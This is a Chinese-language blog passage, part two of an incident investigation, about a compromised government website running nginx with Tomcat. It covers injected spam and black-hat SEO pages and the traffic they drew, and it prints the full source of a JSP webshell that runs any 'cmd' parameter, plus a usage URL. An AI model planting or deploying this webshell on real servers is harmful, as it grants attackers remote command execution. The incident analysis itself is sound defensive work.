网站被植入webshel??l导致网站瘫痪，网络安全防范太重要了( 二 ) _webshel??l

首先查看以html结尾的静态文件内容是什么吧，这里就以这个996.html文件为例，通过浏览器访问996.html文件，顿时，傻眼了！！！请看下图：

文章插图

百度，中奖查询！！！，此时脑子的第一反应是，网站被植入WebShell了，看来问题非常严重。
接着，继续打开1.jsp这个文件，看看这个文件到底是什么鬼，此文件内容如下：（代码仅供学习，请勿其它用途）
<%@page import="java.io.IOException"%><%@page import="java.io.InputStreamReader"%><%@page import="java.io.BufferedReader"%><%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%><% String cmd = request.getParameter("cmd"); System.out.println(cmd); Process process = null;List<String> processList = new ArrayList<String>();try {if (cmd!=null) { process = Runtime.getRuntime().exec(cmd);BufferedReader input = new BufferedReader(new InputStreamReader(process.getInputStream()));String line = "";while ((line = input.readLine()) != null) {processList.add(line);}input.close();} } catch (IOException e) {e.printStackTrace();} String s = ""; for (String line : processList) {s += line + "n"; }if (s.equals("")) { out.write("null"); }else { out.write(s); }%>好嘛，稍懂程序的人都能看出，这是一个WebShell木马后门，它能干啥，先来试试，就知道了，打开浏览器，访问：http://ip/htm/1.jsp?cmd=ls /,
如下图所示：

文章插图

这不是我的服务器根目录吗，然后将”cmd=“后面的字符替换成任意linux下可执行的命令，都能正常执行，这就是浏览器下的命令行啊！！！
再执行一个写操作看看，在浏览器访问如下地址：

文章插图

[apsds@tomcatserver1 htm]$ pwd/usr/local/tomcat/webApps/ROOT/htm[apsds@tomcatserver1 htm]$ ll test.html -rw-r----- 1 apsds apsds 0 10月 16 10:57 test.html看到了吧，成功写入。

不过还是比较幸运的，因为tomcat进程是通过普通用户apsds启动的，所以通过这个1.jsp只能在apsds用户权限下进行添加、删除操作，如果tomcat是以root用户启动的话，那问题就更严重了，因为这个1.jsp可以对系统下任意文件或目录进行修改、删除操作了，其实相当于浏览器的root权限操作了。

到这里为止，好像问题正在逐渐浮出水面。
但是，我们高兴太早了，上个文件还没完全搞清楚，新的问题又来了，我们在查询客户网站搜索权重的时候，新的问题出现了，如下图所示：

文章插图

这是在搜索引擎搜到的客户网站内容，很明显，客户网站被植入了非法内容，然后被搜索引擎收录了，点开搜索出来的任意一个页面，内容如下：

文章插图

经过分析，可以发现，这个页面的部分内容被替换了，替换的内容都是一些网站的关键字，应该是黑帽seo的手段。

这里说到了搜索引擎，突然意识到，此次的故障，是否跟搜索引擎有关系呢？

整理了一下思路，感觉应该是这样的：

1、网站应该有程序漏洞，在互联网被扫描到，然后注入了webshell 。
2、骇客通过webshell植入了大量广告、推销网页。
3、因为网站（gov网站）权重比较高，所以搜索引擎比较喜欢来访
4、大量广告、推销网页被搜索引擎抓取，导致网站访问量激增。
5、客户的网站是nginx+多个tomcat实现的负载均衡，所有动态、静态页面请求都交给tomcat来处理，当出现大量静态请求时，可能会导致tomcat
无法响应。因为tomcat处理静态请求性能很差。

2.3、第三次排查
带着上面这个思路，继续进行排查，步骤如下：
1、排查网站上被注入的html页面的数量
通过find查找、过滤，发现被植入的html页面有两类，分别是百度虚假中奖广告页面和黑帽seo关键字植入页面。
两种类型的html页面，总共有20w个左右，这个数量相当惊人。
2、排查网站访问日志
通过对tomcat访问日志的统计和分析，发现每天对这些注入页面的访问量超过500w次，并且几乎全部是通过搜索引擎过来的流量，做了个简单的过滤统计，结果如下：